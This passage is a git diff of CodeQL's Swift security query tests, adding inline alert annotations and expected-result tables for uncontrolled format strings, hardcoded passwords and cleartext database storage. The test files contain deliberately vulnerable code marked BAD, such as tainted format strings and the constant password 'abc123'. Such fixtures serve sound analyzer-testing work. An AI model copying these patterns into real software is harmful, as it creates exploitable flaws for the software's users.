UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref index 115fef47e47e..62b791e5d6f7 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.qlref @@ -1 +1,2 @@ -queries/Security/CWE-134/UncontrolledFormatString.ql \ No newline at end of file +query: queries/Security/CWE-134/UncontrolledFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift index 2e3b082c63ea..e17394cc466d 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift @@ -76,7 +76,7 @@ func vasprintf_l(_ ret: UnsafeMutablePointer?>?, _ l func MyLog(_ format: String, _ args: CVarArg...) { withVaList(args) { arglist in - NSLogv(format, arglist) // BAD + NSLogv(format, arglist) // BAD // $ Alert } } @@ -88,34 +88,34 @@ class MyString { } func tests() throws { - let tainted = try! String(contentsOf: URL(string: "http://example.com")!) + let tainted = try! String(contentsOf: URL(string: "http://example.com")!) // $ Source _ = String("abc") // GOOD: not a format string _ = String(tainted) // GOOD: not a format string _ = String(format: "abc") // GOOD: not tainted - _ = String(format: tainted) // BAD + _ = String(format: tainted) // BAD // $ Alert _ = String(format: "%s", "abc") // GOOD: not tainted _ = String(format: "%s", tainted) // GOOD: format string itself is not tainted - _ = String(format: tainted, "abc") // BAD - _ = String(format: tainted, tainted) // BAD + _ = String(format: tainted, "abc") // BAD // $ Alert + _ = String(format: tainted, tainted) // BAD // $ Alert - _ = String(format: tainted, arguments: []) // BAD - _ = String(format: tainted, locale: nil) // BAD - _ = String(format: tainted, locale: nil, arguments: []) // BAD - _ = String.localizedStringWithFormat(tainted) // BAD + _ = String(format: tainted, arguments: []) // BAD // $ Alert + _ = String(format: tainted, locale: nil) // BAD // $ Alert + _ = String(format: tainted, locale: nil, arguments: []) // BAD // $ Alert + _ = String.localizedStringWithFormat(tainted) // BAD // $ Alert - _ = NSString(format: NSString(string: tainted), "abc") // BAD - NSString.localizedStringWithFormat(NSString(string: tainted)) // BAD + _ = NSString(format: NSString(string: tainted), "abc") // BAD // $ Alert + NSString.localizedStringWithFormat(NSString(string: tainted)) // BAD // $ Alert - _ = NSMutableString(format: NSString(string: tainted), "abc") // BAD - NSMutableString.localizedStringWithFormat(NSString(string: tainted)) // BAD + _ = NSMutableString(format: NSString(string: tainted), "abc") // BAD // $ Alert + NSMutableString.localizedStringWithFormat(NSString(string: tainted)) // BAD // $ Alert NSLog("abc") // GOOD: not tainted - NSLog(tainted) // BAD - MyLog(tainted) // BAD + NSLog(tainted) // BAD // $ Alert + MyLog(tainted) // BAD // $ Alert - NSException.raise(NSExceptionName("exception"), format: tainted, arguments: getVaList([])) // BAD + NSException.raise(NSExceptionName("exception"), format: tainted, arguments: getVaList([])) // BAD // $ Alert let taintedVal = Int(tainted)! let taintedSan = "\(taintedVal)" @@ -127,32 +127,32 @@ func tests() throws { _ = String("abc").appendingFormat("%s", "abc") // GOOD: not tainted _ = String("abc").appendingFormat("%s", tainted) // GOOD: format not tainted - _ = String("abc").appendingFormat(tainted, "abc") // BAD + _ = String("abc").appendingFormat(tainted, "abc") // BAD // $ Alert _ = String(tainted).appendingFormat("%s", "abc") // GOOD: format not tainted let s = NSMutableString(string: "foo") s.appendFormat(NSString(string: "%s"), "abc") // GOOD: not tainted - s.appendFormat(NSString(string: tainted), "abc") // BAD + s.appendFormat(NSString(string: tainted), "abc") // BAD // $ Alert _ = NSPredicate(format: tainted) // GOOD: this should be flagged by `swift/predicate-injection`, not `swift/uncontrolled-format-string` tainted.withCString({ cstr in - _ = dprintf(0, cstr, "abc") // BAD + _ = dprintf(0, cstr, "abc") // BAD // $ Alert _ = dprintf(0, "%s", cstr) // GOOD: format not tainted - _ = vprintf(cstr, getVaList(["abc"])) // BAD + _ = vprintf(cstr, getVaList(["abc"])) // BAD // $ Alert _ = vprintf("%s", getVaList([cstr])) // GOOD: format not tainted - _ = vfprintf(nil, cstr, getVaList(["abc"])) // BAD + _ = vfprintf(nil, cstr, getVaList(["abc"])) // BAD // $ Alert _ = vfprintf(nil, "%s", getVaList([cstr])) // GOOD: format not tainted - _ = vasprintf_l(nil, nil, cstr, getVaList(["abc"])) // BAD + _ = vasprintf_l(nil, nil, cstr, getVaList(["abc"])) // BAD // $ Alert _ = vasprintf_l(nil, nil, "%s", getVaList([cstr])) // GOOD: format not tainted }) myFormatMessage(string: tainted, "abc") // BAD [NOT DETECTED] myFormatMessage(string: "%s", tainted) // GOOD: format not tainted - _ = MyString(format: tainted, "abc") // BAD + _ = MyString(format: tainted, "abc") // BAD // $ Alert _ = MyString(format: "%s", tainted) // GOOD: format not tainted - _ = MyString(formatString: tainted, "abc") // BAD + _ = MyString(formatString: tainted, "abc") // BAD // $ Alert _ = MyString(formatString: "%s", tainted) // GOOD: format not tainted } diff --git a/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref b/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref index d28ad54bed62..888be87992dd 100644 --- a/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref +++ b/swift/ql/test/query-tests/Security/CWE-135/StringLengthConflation.qlref @@ -1 +1 @@ -queries/Security/CWE-135/StringLengthConflation.ql \ No newline at end of file +query: queries/Security/CWE-135/StringLengthConflation.ql diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 0c1e98bfe7c6..80758dc286ca 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected @@ -1,3 +1,30 @@ +#select +| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | +| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | +| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | +| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | edges | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | @@ -64,30 +91,3 @@ nodes | test.swift:67:34:67:34 | constantPassword | semmle.label | constantPassword | | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths -#select -| rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:93:39:93:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:93:39:93:39 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:94:37:94:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:94:37:94:37 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:96:68:96:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:96:68:96:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:97:68:97:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:97:68:97:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:98:68:98:68 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:98:68:98:68 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:100:89:100:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:100:89:100:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:101:97:101:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:101:97:101:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:102:89:102:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:102:89:102:89 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:103:97:103:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:103:97:103:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:105:32:105:32 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:105:32:105:32 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:107:61:107:61 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:107:61:107:61 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:108:97:108:97 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:108:97:108:97 | myConstPassword | The value 'abc123' is used as a constant password. | -| test.swift:51:30:51:30 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:51:30:51:30 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:52:30:52:30 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:52:30:52:30 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:56:40:56:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:56:40:56:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:57:40:57:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:57:40:57:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:62:40:62:40 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:62:40:62:40 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:63:40:63:40 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:63:40:63:40 | constantStringPassword | The value 'this string is constant' is used as a constant password. | -| test.swift:67:34:67:34 | constantPassword | test.swift:43:39:43:134 | [...] | test.swift:67:34:67:34 | constantPassword | The value '[...]' is used as a constant password. | -| test.swift:68:34:68:34 | constantStringPassword | test.swift:29:3:29:3 | this string is constant | test.swift:68:34:68:34 | constantStringPassword | The value 'this string is constant' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref index 0613f1926315..57f452daecff 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.qlref @@ -1 +1,2 @@ -queries/Security/CWE-259/ConstantPassword.ql +query: queries/Security/CWE-259/ConstantPassword.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift index 6de5873c459e..1f65a919d328 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift +++ b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift @@ -66,7 +66,7 @@ func test(cond: Bool) { let myData = Data(0) let myRandomPassword = getARandomPassword() - let myConstPassword = "abc123" + let myConstPassword = "abc123" // $ Source let myMaybePassword = cond ? myRandomPassword : myConstPassword // reasonable usage @@ -74,11 +74,11 @@ func test(cond: Bool) { let a = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myRandomPassword) // GOOD let _ = try? myDecryptor.decryptData(a, withPassword: myRandomPassword) // GOOD - let b = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myDecryptor.decryptData(b, withPassword: myConstPassword) // BAD + let b = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(b, withPassword: myConstPassword) // BAD // $ Alert - let c = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myMaybePassword) // BAD - let _ = try? myDecryptor.decryptData(c, withPassword: myMaybePassword) // BAD + let c = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myMaybePassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(c, withPassword: myMaybePassword) // BAD // $ Alert // all methods @@ -88,22 +88,22 @@ func test(cond: Bool) { let mySalt = Data(0) let mySalt2 = Data(0) - let _ = myEncryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myEncryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myDecryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD - let _ = myDecryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myEncryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myDecryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert + let _ = myDecryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD // $ Alert - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD // $ Alert - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD // $ Alert - let _ = RNDecryptor(password: myConstPassword, handler: myHandler) // BAD + let _ = RNDecryptor(password: myConstPassword, handler: myHandler) // BAD // $ Alert - let _ = try? myDecryptor.decryptData(myData, withPassword: myConstPassword) // BAD - let _ = try? myDecryptor.decryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD + let _ = try? myDecryptor.decryptData(myData, withPassword: myConstPassword) // BAD // $ Alert + let _ = try? myDecryptor.decryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-259/test.swift b/swift/ql/test/query-tests/Security/CWE-259/test.swift index 923c49bffbd3..b4870c88c3dc 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-259/test.swift @@ -26,7 +26,7 @@ final class Scrypt { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -40,7 +40,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let constantPassword: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let constantPassword: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let constantStringPassword = getConstantArray() let randomPassword = getRandomArray() let randomArray = getRandomArray() @@ -48,23 +48,23 @@ func test() { let iterations = 120120 // HKDF test cases - let hkdfb1 = HKDF(password: constantPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD - let hkdfb2 = HKDF(password: constantStringPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD + let hkdfb1 = HKDF(password: constantPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert + let hkdfb2 = HKDF(password: constantStringPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert let hkdfg1 = HKDF(password: randomPassword, salt: randomArray, info: randomArray, keyLength: 0, variant: variant) // GOOD // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomPassword, salt: randomArray, iterations: iterations, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: constantPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: constantStringPassword, salt: randomArray, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomPassword, salt: randomArray, iterations: iterations, keyLength: 0) // GOOD // Scrypt test cases - let scryptb1 = Scrypt(password: constantPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD - let scryptb2 = Scrypt(password: constantStringPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD + let scryptb1 = Scrypt(password: constantPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert + let scryptb2 = Scrypt(password: constantStringPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // BAD // $ Alert let scryptg1 = Scrypt(password: randomPassword, salt: randomArray, dkLen: 64, N: 16384, r: 8, p: 1) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index 204e2486cc2f..e3517d648265 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected @@ -1,3 +1,143 @@ +#select +| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:140:24:140:24 | updateQuery | 